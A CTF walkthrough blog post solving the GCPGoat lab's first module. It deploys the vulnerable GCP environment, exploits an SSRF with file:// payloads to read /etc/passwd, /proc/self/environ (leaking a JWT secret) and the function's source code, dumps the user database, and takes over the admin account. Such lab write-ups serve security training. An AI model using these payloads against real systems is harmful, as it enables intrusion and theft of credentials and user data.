GCPGoat(ine) GCP CTF solution Module 1-Path 2(SSRF, source code review, privilege escalation)
Hi readers, here we will be deploying and solving GCPGoat module 1 challenge.
We will be going through the second path in this walkthrough, as shown in the diagram below.
Video Walkthrough:
https://www.youtube.com/watch?v=fyCtrM3eCd8
https://www.youtube.com/watch?v=dtLg4Z8bHNk
Prerequisites-
a. Admin access in the GCP account(You can create a new free tier account)
b. Already installed terraform
Deploying challenge-
- Clone the project-
git clone https://github.com/ine-labs/GCPGoat
2. Install gcloud cli if not already installed
a. Follow the detailed steps from the official documentation below-
b. Initialize or reinitialize gcloud
gcloud init
# "gcloud init --help" for more info
3. Authentication
a.
gcloud auth application-default login
b. You will get a url. Open this in a browser where you are logged in using the administrative gcloud account.
c. After opening this url, it will redirect to some other url starting with something like “http://localhost:8085/…..”
d. Copy that url, then open that using curl or in web browser.
Note: Basically this url generates access/session keys for which our gcloud cli is listening for on port 8085.
Bonus: Potential attack vector. If someone is able to trick the user to open an authentication URL where the user is logged in to the gcloud account and then if somehow the attacker steals or fools user to share this localhost URL to the attacker. This can lead to gcloud takeover!!
4. Change the billing account name in main.tf file(if you are using non default billing account)-
5. Then for deploying terraform resources run-
terraform init
terraform apply --auto-approve
Solving Challenge-
- Finding SSRF-
a. Signup and log in to the web application.
b. Scan the web app after logging in using burp suite (because we are lazy :)
We got SSRF-
https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/save-content?value=<collaborator_link>
Note: You can use free alternative for collaborator- https://app.interactsh.com/
2. Exploiting SSRF-
?value=file:///etc/passwd
?value=file:///proc/self/environ
#Reading environment variables, We have seen this in detail here https://pswalia2u.medium.com/turning-lfi-into-rce-by-sending-emails-via-smtp-58b499a81de3
#Found JWT secret in env variable
T2BYL6#]zc>Byuzu
#Found project name
gcp-goat-9a658560d7afd9b8
#Present working directory of process
/workspace
file:///proc/self/status
#Reading proccess info
Upon matching uid(33) and gid(33) in “passwd” output, we can determine user with which this process running is www-data
/proc/sys/kernel/hostname #fetching hostname
localhost
/proc/self/cmdline
/layers/google.python.pip/pip/bin/python3 /layers/google.python.pip/pip/bin/functions-framework
Searching(googling or chat gpt) about “functions-framework”
I came across its github repo(https://github.com/GoogleCloudPlatform/functions-framework-python). In the example show there to use this user creates a main.py file
So it is worth checking if this file is present in the current working directory….
#trying to find and read source code
/workspace/main.py
As expected we got main.py source code-
3. Source code analysis-
On line 226 we found a backup file path-
4. Fetching dump file-
#<function end point>/dump-db-321423541325
https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/dump-db-321423541325/dump-db-321423541325
We got password hashes and profile details of other user accounts!!
5. Let’s try to crack these password hashes-
# john doe has user id "1" (usually first user in any cms is administrator, so lets try to crack his password)
$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO
6. Privesc to admin-
or as we already have answers of security questions and email id we can abuse forgot password functionality.
{
"password":"$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO",
"userStatus":"active",
"id":"1",
"phone":"1234567890",
"creationDate":"2022-01-25T00:00:00.000Z",
"country":"India",
"authLevel":"0",
"address":"John Doe apartment, John Doe Street, Pune",
"secretAnswer":"Cricket",
"secretQuestion":"What is your favourite sport?",
"email":"johndoe@gmail.com",
"username":"johndoe",
"name":"John Doe"
}
7. Logging in as jhondoe
And we got an Admin user!!
References-